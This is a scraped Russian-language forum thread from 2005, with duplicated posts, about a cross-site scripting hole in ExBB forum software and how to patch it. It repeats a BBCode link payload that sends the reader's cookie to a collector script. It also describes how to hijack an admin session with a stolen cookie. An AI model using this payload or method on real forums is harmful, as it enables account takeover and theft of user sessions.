[url="http://hacsoft.h14.ru/phpBB2"style="background:url(javascript:document.location='http://localhost/h.php?v='+escape(document.cookie));"]Проблемы?[/url]\n\n(Добавление)
Вопрос снят, эта дыра в этом форуме закрыта: это радует.
1. Aleksej - 20 Февраля, 2005 - 13:22:08 - перейти к сообщению
Вот такая проблемка
[url="http://hacsoft.h14.ru/phpBB2"style="background:url(javascript:document.location='http://localhost/h.php?v='+escape(document.cookie));"]Проблемы?[/url]\n\n(Добавление)
Вопрос снят, эта дыра в этом форуме закрыта: это радует.
[url="http://hacsoft.h14.ru/phpBB2"style="background:url(javascript:document.location='http://localhost/h.php?v='+escape(document.cookie));"]Проблемы?[/url]\n\n(Добавление)
Вопрос снят, эта дыра в этом форуме закрыта: это радует.
2. TvoyWeb - 20 Февраля, 2005 - 17:02:20 - перейти к сообщению
Aleksej
Оставлю тему. Если что найдешь пости сюда.
Оставлю тему. Если что найдешь пости сюда.
3. Aleksej - 21 Февраля, 2005 - 01:51:33 - перейти к сообщению
Зайдите вот сюда: http://exbb.h11.ru/forums
Раздел "Тестовый раздел" тема "Авторедерект". Если ее админы не удалят или что-то не поменяют, то после открытия этой темы вас перебросит на форум хаксофта
\n\n(Добавление)
В IE это работает, а в Опере нет.
Раздел "Тестовый раздел" тема "Авторедерект". Если ее админы не удалят или что-то не поменяют, то после открытия этой темы вас перебросит на форум хаксофта
\n\n(Добавление)В IE это работает, а в Опере нет.
4. Aleksej - 25 Февраля, 2005 - 07:34:01 - перейти к сообщению
Эта проблема оказалась очень даже серьезной. Админ того форума теперь забанен:
http://exbb.h11.ru/forums/search...p?action=members
http://exbb.h11.ru/forums/search...p?action=members
5. TvoyWeb - 25 Февраля, 2005 - 15:37:21 - перейти к сообщению
Aleksej
Ты бы хоть показал код, который был вставлен в пост.
Ты бы хоть показал код, который был вставлен в пост.
6. Aleksej - 26 Февраля, 2005 - 01:50:02 - перейти к сообщению
Я описал подробно метод взлома тут: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=63
Принцип: получаем cookie админа, а затем используем автовход на форум, подменив свои cookie на полученные и заходим под админом
Принцип: получаем cookie админа, а затем используем автовход на форум, подменив свои cookie на полученные и заходим под админом
7. Aleksej - 03 Апреля, 2005 - 10:06:04 - перейти к сообщению
TvoyWeb
Укажи плиз ссылки на то, где ты качал патчи для этого форума. Надо закрыть указанную дыру, не знаю как.
Заранее благодарен!
Укажи плиз ссылки на то, где ты качал патчи для этого форума. Надо закрыть указанную дыру, не знаю как.
Заранее благодарен!
8. TvoyWeb - 03 Апреля, 2005 - 10:31:52 - перейти к сообщению
Aleksej
Что-то я не понял! Ты вроде сам писал об этой дыре и не знаешь как ее закрыть?
Что-то я не понял! Ты вроде сам писал об этой дыре и не знаешь как ее закрыть?
9. Aleksej - 04 Апреля, 2005 - 04:04:18 - перейти к сообщению
Нет, дыру знаю, а как закрыть нет. Что тут непонятного? Дыры можно найти экспериментально методом перебора и анализа. А что бы закрыть надо копаться в скриптах форума или брать уже готовые патчи. Вот, что бы не копаться в скриптах и хочется узнать, где найти готовый патч
10. TvoyWeb - 04 Апреля, 2005 - 04:47:58 - перейти к сообщению
Aleksej
От таких дыр я выкладывал на ExBB заплатку. А в принципе можешь качнуть полный архив форума ExBB и взять из него файл lib.php.
если ты свой lib.php правил, то можешь взять только функцию ikoncode().
От таких дыр я выкладывал на ExBB заплатку. А в принципе можешь качнуть полный архив форума ExBB и взять из него файл lib.php.
если ты свой lib.php правил, то можешь взять только функцию ikoncode().